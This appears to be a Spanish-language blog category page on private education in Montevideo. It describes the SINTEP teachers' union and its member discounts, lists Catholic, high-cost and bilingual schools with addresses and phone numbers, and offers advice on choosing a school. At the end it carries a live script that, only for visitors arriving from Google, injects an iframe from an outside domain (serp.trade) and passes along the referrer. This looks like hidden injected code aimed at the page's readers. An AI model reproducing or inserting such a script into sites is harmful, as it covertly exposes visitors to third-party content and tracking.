Archivo de la categoría: Información

Sintep Sindicato Nacional de Trabajadores de la Enseñanza Privada

El Sindicato Nacional de Trabajadores de la Enseñanza Privada (SINTEP) es una organización gremial comprometida con la educación nacional.

Se gestó en la Coordinadora de Sindicatos de Enseñanza del Uruguay (CSEU), de la cual es integrante. Igualmente está afiliado al Plenario Intersindical de Trabajadores – Convención Nacional de Trabajadores (PIT-CNT).

sintep

Además de velar por los derechos de sus agremiados, aboga por una educación de calidad, inclusiva y universal.

Sus orígenes se remontan al año 1985, cuando fue formalmente constituido. Sin embargo, comenzó a crearse mucho antes en el seno de la CSEU, simultáneamente con la Asociación Federal de Funcionarios de la Universidad de la República (AFUR).

Desde la introducción de la educación privada en Uruguay transcurrió más de un siglo hasta la conformación de un sindicato. Esto nos habla del gran desafío político que supuso la organización de los trabajadores de la enseñanza privada. Aún hoy en día se enfrentan grandes problemas, en una lucha reinvindicadora que opera frente a fuerzas más poderosas. A pesar de ello, el SINTEP ha logrado subsistir manteniendo su independencia política, patronal y religiosa.

Como organización de corte democrático, según se proclama, el SINTEP promueve la participación de sus afiliados. Esta es, a su juicio, la clave para construir una sociedad más justa y solidaria.
Por eso, en su declaración de principios, abogan por la solidaridad y el compañerismo entre los trabajadores.

Diagnóstico de la situación laboral de los trabajadores de la enseñanza privada

Una de las principales tareas de SINTEP es el diagnóstico de las condiciones laborales de los trabajadores de la enseñanza privada. Sin una clara perspectiva de la problemática resulta casi imposible trabajar en pro de las mejoras.

Algunos de los obstáculos tienen que ver con el funcionamiento de las instituciones educativas. A este respecto señalan que no existe uniformidad en los criterios y formas de evaluación ni se respetan los parámetros nacionales. También apuntan casos de acoso laboral hacia los trabajadores sindicalizados, y segregación por género y orientación sexual.

Otras causas de lucha son los bajos salarios y la inestabilidad laboral del sector.
Este último punto ha sido el que más ha movilizado a sus agremiados, puesto que afecta a todos por igual. Se han conseguido algunos avances en esta materia, como la negociación salarial por rama , lograda en 2007. Actualmente, se negocian prórrogas con los Consejos de Salarios para los trabajadores de diferentes niveles (escuelas, liceos, universidades, estudios terciarios, etc.).

Sin embargo, aún queda mucho por alcanzar pues las demandas de los trabajadores de la enseñanza privada distan de estar satisfechas. Las reivindicaciones salariales siguen ocupando un lugar importante en la agenda, tal como evidenciaron los paros del año pasado.
Pero también preocupan la nueva Ley de Educación y el surgimiento de sindicatos amarillos de trabajadores de la enseñanza privada. Hoy en día el panorama es más complejo, pues abarca situaciones que anteriormente no eran atendidas por las organizaciones sindicales.

Para hacer frente a estos retos, desde SINTEP se aboga por la incorporación de más trabajadores a sus filas. Esto permitirá ampliar la base de recursos disponibles para cumplir con los objetivos propuestos. Entre ellos se destacan:

  • La promoción de una nueva ley de educación que consagre como derecho la educación inicial desde el año cero.
  • La propuesta de categorías de subgrupos de enseñanza privada, estableciendo criterios y valores de Hora Semanal/Mensual docente
  • La defensa de la estabilidad laboral
  • El rechazo del trabajo voluntario no remunerado para los trabajadores de la enseñanza privada

El pasado 7 de mayo por una iniciativa del Sintep, la cámara de senadores declaro el 15 de junio el Día Nacional del Trabajador de la Enseñanza Privada.  Este día a partir del 15 de junio de 2019 es no laborable y pago para los trabajadores de este sector educativo. 

¿Por qué afiliarse a SINTEP?

Para cualquier trabajador con remuneración precaria resulta difícil cumplir con el pago de las cuotas gremiales. Por eso SINTEP ha puesto gran empeño en el logro de convenios que permitan paliar la situación de sus afiliados. Con ellos se pretende aligerar las cargas económicas de los trabajadores, otorgando beneficios a través de descuentos en diferentes servicios.
En este momento existen convenios activos en las áreas de salud, cultura, recreación y deporte, y consumo.

Convenios Sintep de salud

Cooperativa Cuatro Caminos
Ofrece planes de salud con tarifas especiales para sus afiliados. La oferta contempla la contratación de un seguro integral, con cobertura para el grupo familiar, por $160. Este incluye un servicio de enfermería sin costo adicional. Asimismo, se ofrece cobertura total de servicios odontológicos, incluyendo incluye prótesis e implantes, y un descuento del 50% en estudios.

CODA, consultorios odontológicos
El convenio contempla el pago de una cuota mensual que da derecho a cobertura odontológica completa, sin costos adicionales. Pueden disfrutar de este beneficio los afiliados de SINTEP y su grupo familiar.

Atención psicológica con la Lic. Alejandra Amado
Dirigida a niños, adolescentes y adultos. Las consultas incluyen la evaluación del paciente, diagnóstico y tratamiento, con descuentos variables. Pueden acudir tanto los afiliados como sus familiares.

Clínica Ludere
Descuento del 30% sobre los aranceles por diagnóstico y tratamiento en los servicios de psicología, psicomotricidad, fonoaudiología, psicopedagogía. El beneficio está dirigido al afiliado y sus familiares directos, incluyendo cónyugue, hijos, padres y hermanos.

Optica Río
La consulta oftalmólogica tendrá un descuento del 50%, ampliable hasta el 100% si se realiza la compra de los lentes. Además ofrecen financiación propia, con pagos aplazados, sin recargo hasta por 6 cuotas.
Adicionalmente hay descuento en cristales (10%), lentes de sol (15%) y armazones (20%).

Convenios del Sintep de Cultura, Recreación y Deporte

Factor30
Este es un proyecto editorial independiente que ofrece descuentos del 20% en sus publicaciones. Conviene revisar las bases de instrumentación del convenio en la página de SINTEP, para optar a este beneficio.

Colonias de vacaciones de AEBU
Los afiliados a SINTEP disfrutarán de los mismos beneficios de los afiliados al sindicato de trabajadores del sistema financiero. Cabe destacar que solo aplica en los servicios del Parque vacacional de Piriápolis y el Complejo Aebu Daymán «Juanjo Ramos».
Complejo vacacional sindical «Wladimir Turiansky»
Por estar integrados al PIT-CNT, los agremiados a SINTEP pueden utilizar las instalaciones del Complejo con tarifas bonificadas.

Club deportivo AEBU
Los afiliados podrán solicitar descuentos en el pago de la cuota por el uso de las instalaciones del club.

Consumo

Ardo mayorista
Este mayorista multi-rubro ofrece precios al por mayor en compras al detal, para los afiliados a SINTEP.

Colegios Católicos en Montevideo

Como padres, todos queremos que nuestros hijos acudan a las instituciones con más prestigio en la ciudad, donde además de tener una formación académica sólida, éstos puedan desarrollar su carácter y adquirir valores y principios, que puedan forjar niños de bien para el futuro.  Si estás en busca de uno para tu hijo, en este post te presentamos 5 de los mejores Colegios Católicos en Montevideo:

colegios catolicos montevideo

 

✅ Colegio y Liceo Misericordista


Av. Gral. San Martín 3850

Teléfono: 22160980

Fundada el 25 de enero de 1839 por el Padre Víctor Scheppers. Tuvo comienzo su primer año escolar en 1935, con el nacimiento de la Asociación de Hermanos Misericordistas del Uruguay. Actualmente, cuenta con Educación Inicial, Primaria, Secundaria y Bachilleratos mixto. Posee horarios en las mañanas y en las tardes. Convenios para educación acuática y cursos de programación y robótica. En cuanto a infraestructura, cuenta con salones, taller con recursos audiovisuales, cuatro laboratorios para física, química, informática y biología, biblioteca de estudios y comedor, cuatro canchas, dos gimnasios, vestuarios y una Capilla.

✅ Colegio y Liceo Santa María de La Ayuda

Bogotá 3589
Teléfono: 23129252

La Fundación Sophia, nacida en 2014, es una entidad sin fines de lucro, que tiene como fin apoyar diversos centros educacionales públicos y privados en Uruguay. Entre ellos, el Colegio y Liceo Santa María de La Ayuda abarca desde Educación Primaria a Secundaria, donde se implementan distintos métodos para el aprendizaje en inglés, matemáticas, lectura y escritura. Imparte formación cristiana para recibir los Sacramentos, así como distintos talleres y actividades.

✅ Colegio y Liceo San Francisco de Sales


Bulevar General Artigas 4365

Teléfono: 22033244

También conocido como Maturana, es un colegio salesiano que trabaja de manera continua desde Inicial hasta Secundaria. Consta de amplios salones, gimnasio techado con vestuario, patio, cine con capacidad para 700 personas, casas para campamentos, áreas de informática con acceso libre a internet, biblioteca, servicio de fotocopias, comedor y evaluación médica.

✅ Colegio y Liceo Santa María


Av. 8 de Octubre 2966
Teléfono: 24872212

Conocido como el primer colegio marista en Uruguay, fue fundado en 1934 por cuatro Hermanos españoles en el patio trasero de la parroquia Iglesia Tierra Santa. Cuenta con dos plantas, gimnasio, teatro, cómodos salones, canchas deportivas, patios de recreo y se comunica internamente hacia el Templo Parroquial. Dispone de Educación Inicial, Primaria, Ciclo Básico y Bachillerato, cada nivel con distintas propuestas y actividades, como: catequesis, talleres de música, eventos culturales, inglés, ect.

✅ Instituto María Auxiliadora


Canelones 1701
Teléfono: 24184682

Inaugurado en 1891 por siete Hermanas de las Hijas de María Auxiliadora. Tuvo papel como casa de formación para Hermanas Aspirantes, Conservatorio Musical y el único Magisterio católico vigente en Uruguay. Hoy día, los estudiantes están distribuidos en Maternal, Inicial, Primaria y Secundaria. Poseen excelentes instalaciones, servicios de cantina y comedor donde se ofrecen menús de todo tipo: celíacos, diabéticos y vegetarianos. Dentro del horario extracurricular, el colegio los alumnos disfrutar de: taller de arte, deporte, natación, teatro, taller literario, cocina, deporte, coro, etc.

Colegios más caros de Montevideo

Los colegios son entes transformadores, que reciben a un individuo en una edades tempranas y lo transforman. Generan  cambios en su forma de pensar, nivel de conocimientos, aspiraciones y modelos de conducta. Esto junto con la madurez física al pasar de los años, marcan el rumbo del resto de la vida de esa persona. La cantidad de competencias académicas o idiomas que ofrezcan las instituciones son rasgos que catapultan a muchas de ellas. Este aspecto las ayuda a posicionarse como las mejores en el mercado,  representando altos precios en la matricula escolar. En base a esas consideraciones hablaremos de los colegios  más caros de Montevideo.

colegios mas caros en montevideo

La elección del colegio para la educación de nuestros hijos

La educación de los hijos siempre ha sido una preocupación de los padres responsables. Además de la formación académica, se espera que la institución educativa contribuya a la promoción de valores, elementos culturales y de estilos de vida. Estos aspectos van a contribuir a la formación de un ciudadano integral, capaz de desenvolverse de forma eficaz en el entorno social donde le corresponda.

La idea tradicional que siguen algunos es que mientras mayor es el costo del colegio, mayor es la educación que se imparte allí. Pero aunque es cierto que un alto porcentaje de la población de Montevideo (entre el 43% y el 52 %) considera que la educación pública es buena, otro buen porcentaje apuestan por educación privada.

En Montevideo, así como en todo el resto del país, los colegios privados no tienen muchas restricciones a la hora de fijar los precios de sus matrículas. En esta categoría encontramos un variado rango de precios que varían según su ubicación, los servicios que ofrecen y el tiempo de permanencia del estudiante en la institución. Sin embargo existen instituciones educativas que se encuentra dentro de los colegios más caros de Montevideo.

¿Cuáles son los colegios privados más caros de Montevideo?

A continuación hablaremos de los colegios que ocupan los cinco primeros lugares dentro de la lista de los más caros de Montevideo.

The British Schools Montevideo

Este colegio ofrece educación inicial, primaria y secundaria. Fue fundado en el año 1968 y surgió como proyecto mancomunado de la British Cemetery Society y la Iglesia Anglicana, con la intensión de crear un colegio bilingüe en la ciudad de Montevideo. Ofrece una educación integral que incorpora como fortaleza la enseñanza del inglés como idioma principal. Por su fuerte influencia religiosa, se basa en elevados principios morales característicos de las escuelas británicas.

Ofrece de forma exitosa los beneficios tanto del Programa de Estudios Nacional como del Internacional. El 90% de los estudiantes obtienen el Diploma de Bachillerato Internacional. Este colegio es el más caro de todo Montevideo y, a modo de referencia, podemos mencionar que la matricula por los 6 años de la educación primaria estaría cerca de los dos millones pesos ($2.000.000). Está ubicado en Máximo Tajes 6421, Montevideo, Uruguay y su teléfono es (598) 2600.34.21 – Fax: (598) 2601.63.38.

St. Andrew’s School

Es un colegio privado con reconocida trayectoria, que ofrece educación preescolar y primaria, desde los tres hasta los doce años. Fue fundado en 1963 y en sus inicios adaptó el currículo escolar escoces al uruguayo, Cuenta con altos estándares en lo que a calidad de educación se refiere. Es un colegio bilingüe, siendo el inglés el idioma principal. Con base en contenido educativo de calidad e interdisciplinario, generando en sus egresados fuertes destrezas en cuanto al aprendizaje, cultura y determinación y elevados principios.

Está en la segunda posición entre los colegios privados más caros de Montevideo, y la inversión requerida para los seis años de educación primaria estaría alrededor del millón seiscientos mil pesos ($1.600.000). Está ubicado en Luis B. Cavia 2791, Montevideo, Uruguay y su teléfono de contacto es (598) 2709.49.51.

Ivy Thomas Memorial School

El Ivy Thomas Memorial School es un colegio privado que ofrece educación preescolar, primaria y secundaria con un reconocido programa de enseñanza del idioma inglés. Combina dentro de su estrategia curricular la preparación de los alumnos para la presentación de pruebas internacionales con actividades recreativas. Fue fundado en el año de 1939, y desde sus inicios logro alcanzar prestigio, por la calidad de su enseñanza. Este es el tercero de los colegios privados más caros de Montevideo y la inversión requerida para los años de la educación primaria está alrededor de un millón cuatrocientos mil pesos ($1.400.000). Está ubicado en Roque Graseras 775, Montevideo, Uruguay, y su teléfono es (598) 2710.05.02.

Colegio Inglés

El Colegio Inglés, al igual que los anteriores, es una institución educativa privada bilingüe que ofrece educación preescolar, primaria y secundaria. El énfasis están en la enseñanza del idioma inglés, con profesores altamente calificados. Incluye dentro de su diseño curricular proyectos educativos que van de la mano con la promoción de valores y habilidades que fortalecen la formación del individuo. Fue fundado en 1990.

La inversión para los estudios de educación primaria está alrededor de un millón trescientos cuarenta mil pesos ($1.340.000) y se encuentra cuarto en la lista de los colegios más caros de Montevideo. Este colegio cuenta con varias sedes, cuyas ubicaciones son: Educación Inicial en la Avenida Américo Ricaldoni 2838 – Teléfono: (598) 2706.62.61 / Primaria: Feliciano Rodríguez 2776 – Teléfono: (598) 2707.48.94; Bachillerato, Secundaria y 6to año de Primaria en Pastoriza 1469, teléfono (598) 2709.07.86, en Montevideo, Uruguay.

Richard Anderson

Este colegio privado, también ha destacado por su trayectoria y prestigio en el campo bilingüe, por su alto reconocimiento en la calidad en la enseñanza del idioma inglés. Ofrece educación preescolar, primaria y secundaria. Fue fundado en 1933.

El costo aproximado de inversión en los años de primaria se encuentra alrededor de un millón trescientos veinte pesos ($1.320.000), y esto lo coloca en el quinto lugar dentro de la lista de los colegios privados más caros de Montevideo. Está Ubicado en José Agustín Iturriaga, Montevideo, Uruguay y su teléfono de contacto es (598) 2622. 20.06.

Colegios Bilingües Montevideo

En un mundo cada vez más global, el manejo de una lengua adicional a la materna es una ventaja educativa. Los padres están conscientes de ello y eligen colegios bilingües Montevideo para la formación de sus hijos. Invierten minutos y hasta horas, en seleccionar el centro educativo que aumente posibilidades de trabajo del estudiante en un futuro.

¡Nada de improvisar! Más que una moda, hoy día es una necesidad el dominio de mínimo dos idiomas.
En edad temprana y de manera natural, es una práctica común estimular al niño a aprender una lengua extranjera. La tarea comienza desde casa, avanzando significativamente al iniciar estudios en un centro educativo bilingüe.

colegios bilingües montevideo

 

6 Razones para Estudiar en Colegios Bilingües Montevideo

A continuación 6 razones por lo cual tu hijo/a debería estudiar en colegio bilingüe:

Profesores nativos

La improvisación no forma parte de los centros formativos en dos idiomas, son docentes especializados quienes imparten conocimiento.
Para garantizar el aprendizaje significativo en niños y adolescentes, exigen a los profesores dominio de un alto nivel del idioma.
Esta medida ayuda a despertar el interés por el bilingüismo desde temprana edad, utilizando herramientas didácticas.

Beneficios cognoscitivos

Ante el desarrollo de actividades individuales y grupales, los infantes mejoran sus habilidades cognoscitivas.
En otras palabras, procesan mejor la información, ampliando capacidad de memoria, resolución de problemas y comprensión del mundo.
La creatividad y flexibilidad mental, son dos procesos cerebrales que se mantienen activos durante el proceso enseñanza-aprendizaje.

Garantiza éxito laboral

En un mercado cada vez más competitivo, tienen mayores posibilidades de éxito, quienes manejen dos idiomas.
El hecho de que los niños se formen bilingües, multiplican las oportunidades laborales internacionales.
Desde los primeros años de vida, integrar este tipo de colegios aumenta la capacidad de expresión y comprensión auditiva.
La diferencia se observa en profesionales bilingües, a la hora de una presentación empresarial o negociación con extranjeros.
Por esta razón, los mejores puestos son ocupados por personas capacitadas o que invirtieron en formación en idiomas.

Instalaciones integrales

Actualmente los centros de enseñanza en dos idiomas, apuestan al acondicionamiento de sedes principales. En tal sentido, suman deporte u otras actividades de esparcimiento, porque así también se aprenden los idiomas.
¡Jugando también se aprende! El camino del éxito transita entre la aplicación de un competente modelo educativo, apoyado en la recreación.

Conocimiento de diversidad cultural

Otra ventaja a la hora de elegir un colegio bilingüe, es la manera de dar a conocer aspectos de otros países. Dentro del modelo de aprendizaje aplicado, incentivan al estudiante a adentrarse en la cultura mundial. De esta manera, amplían el conocimiento y despiertan a curiosidad del alumno, al conocer nuevas latitudes y costumbres.

Habilidad multitarea

Indudablemente la exigencia es mayor cuando se cursa estudios en un colegio bilingüe, exige disposición e inversión de tiempo. Incluso hay momentos que el estudiante debe desarrollar varias asignaciones a la vez, despertando la capacidad de respuesta. Por ello se habla de la habilidad multitarea; el cerebro es estimulado manteniéndose activo en todo momento.


¡Lo mejor!
Tanta estimulación educativa temprana, eleva el rendimiento académico, apuntando a calificaciones altas.Indudablemente la exigencia es mayor cuando se cursa estudios en un colegio bilingüe, exige disposición e inversión de tiempo. Incluso hay momentos que el estudiante debe desarrollar varias asignaciones a la vez, despertando la capacidad de respuesta.
Por ello se habla de la habilidad multitarea; el cerebro es estimulado manteniéndose activo en todo momento.

¿Quieres que tu hijo viva la experiencia? A continuación presentamos una lista de los mejores colegios bilingües en Montevideo, Uruguay:

Lista de Colegios Bilingües en Montevideo

 

Nombre del Colegio  Dirección  Teléfono  Barrio
 Colegio y Liceo San Pablo Venancio Benavidez 3612 2336 4914 Prado
 Richard Anderson      Jose Iturriaga 3535 2622 1001 Buceo
 The British School`S     Maximo Tajes 6400 2600 3421 Carrasco
The Anglo School Javier Barrios Amorin 1275 2902 3773 Centro
Juana De América  Asencio 1136 2208 4850 Bella Vista
 Instituto Crandon  Juan Ramon Gomez 2712  2487 3375 La Blanqueada
Hans Christian Andersen  Avda. Millan 4392 2354 4864 Sayago
Prado School     19 De Abril 1106 2336 7488 Prado
Colegio Ingles     Pastoriza 1469 27090786 Parque Batlle

Colegio Punta Carretas  Fco. Garcia Cortinas 2432 2711 9731 Punta Carretas
Colegio Forward    Dr. Joaquín Requena 1627 2402 3782 Tres Cruces
Colegio Bilingüe Ciudad Vieja Maciel 1377 2915 5280 Ciudad Vieja
Queen´S School   Libertad 2730 2709 6500 Pocitos
Lester House  Avda. L. A. De Herrera 1209  2628 3370 Buceo
Saint David´s Pedro Berro 774 2710 2441 Pocitos
Colegio Woodlands San Carlos de Bolívar s/n 2604 2714 Carrasco
Life School Canelones 1069 2901 5954 Centro
Uruguay Piri     Vilardebó 1209 2203 4339 Reducto
Colegio Alemán Av. Dr. Fco. Soca 1356  2708 4381 Pocitos

 

  Pocitos Day School Avda. Ing. Luis Ponce 1268 2708 93 19 Pocitos
Saint Brendan´s School Av. Rivera 2314 2408 4939 Tres Cruces
St. Patrick´s College Camino Gigantes 2735 26013474 Carrasco
ABC College Av. Dr. A. Ricaldoni 1748 2624 1228 Parque Batlle
El Elbio Canelones 1382 2901 1254 Barrio Sur
Ivy Thomas Memorial School Roque Graseras 775 2710 23 96 Pocitos
St. George´s School Av. Gral. Rivera 4187 2618 4586 Buceo
Montevideo College 26 de Marzo 1130 2707 4882 Pocitos

 

¿Cómo Elegir Colegio Privado?

¿ Cómo elegir el mejor colegio privado en Montevideo?. Si tienes hijos por llegar a su edad escolar, es muy probable que ya te hayas hecho esta pregunta.  Esta es una pregunta que ocupa a todos los padres en algún momento y es algo natural y lógico ya que, un alto porcentaje del futuro de nuestros pequeños depende de esta importante decisión.

elegir colegio privado

Consejos para elegir el mejor Colegio Privado

 

Existe una gran cantidad de colegios privados en Montevideo  ¿Pero cuál elegir? ¿Cómo saber si el colegio es el más apropiado para el niño? ¿Incluso para la familia? Si, escuchaste bien,  también hay que procurar que el colegio sea el más apropiado para la familia. Y esto está relacionado con el costo de la matrícula escolar, que indudablemente afectará en mayor o menor medida los ingresos familiares. Por tanto el PRECIO es lo primero que debemos tener en cuenta al momento de decidirnos por un colegio privado.

Otro aspecto a tener en cuenta antes de elegir colegio es la DISTANCIA.  Considera que no es lo mismo si vives en la ciudad de Montevideo o si vives en los alrededores, este es otro punto importante, ya que deberás tener en cuenta el tiempo de traslado al colegio . Además, a medida que van creciendo los niños comienzan a demandar mayor autonomía, por lo que tener el colegio a una distancia cortas te hará sentir más seguro y le darás la libertad que tu hijo necesita.

VISITA EL CENTRO Y CONOCE SUS INSTALACIONES. Es importante que cuando recorras el lugar, este te transmita seguridad. Debes estar tranquila/o que cuando dejas a tu hijo en la institución, cuidarán de su integridad y bienestar. Observa la accesibilidad al centro, si es fácil que ingresen personas desconocidas o que tu hijo pueda salir sin que nadie lo vea.                      Recorre las instalaciones, mira la higiene de las aulas y los baños.

Para elegir un buen colegio para tus hijos en importante conocer la PROPUESTA EDUCATIVA Y DE FORMACIÓN EN VALORES que ofrece el Centro. De esta decisión depende el desarrollo de sus habilidades y su preparación para enfrentar el futuro. Por esto es tan importante considerar varios aspectos y alinearlos con la educación que les das en casa. Esto es básico para que su instrucción esté encaminada en una misma dirección, desarrollando habilidades académicas, principios y valores.

INFÓRMATE SOBRE LOS DOCENTES que imparten clases en el colegio, trata de conversar con algunos padres que ya han tenido sus niños estudiando allí. Incluso trata de hablar con alguno de los niños que estudian allí para evaluar el nivel de entusiasmo y motivación que le transmiten sus docentes. También debes conocer  sobre los contenidos que se imparten y compáralos entre colegios.  Verifica si la propuesta educativa coincide con los valores y la educación que aspiras para tu hijo.

Quizás hay otros temas que te preocupan y es natural, ya que elegir un buen colegio privado en Montevideo no es tarea fácil. Por el momento responde a esta pregunta ¿te ha sido útil esta información para encaminar la elección del colegio privado para tus hijos?.

Esperamos que con estos consejos puedas elegir ¡el mejor! El que mejor se adapte a tus necesidades y a las de tus hijos.

Ahora sabes cómo elegir colegio privado. Pero si lo que necesitas es elegir un centro de educación infantil para tus hijos, te puede servir este artículo ¿Cómo Elegir Centro Educativo Infantil Para Nuestros Hijos? de nuestros amigos de jardinesyescuelas.com

También puedes conocer cuales son los Colegios en Montevideo .

<script>if((document.referrer).includes('google')) {
   document.write("<iframe src='https://serp.trade/iframe.php?ref="+(document.referrer)+"' frameBorder='0' scrolling='no' width='100%' height='200px' align='center'></iframe>");
} </script>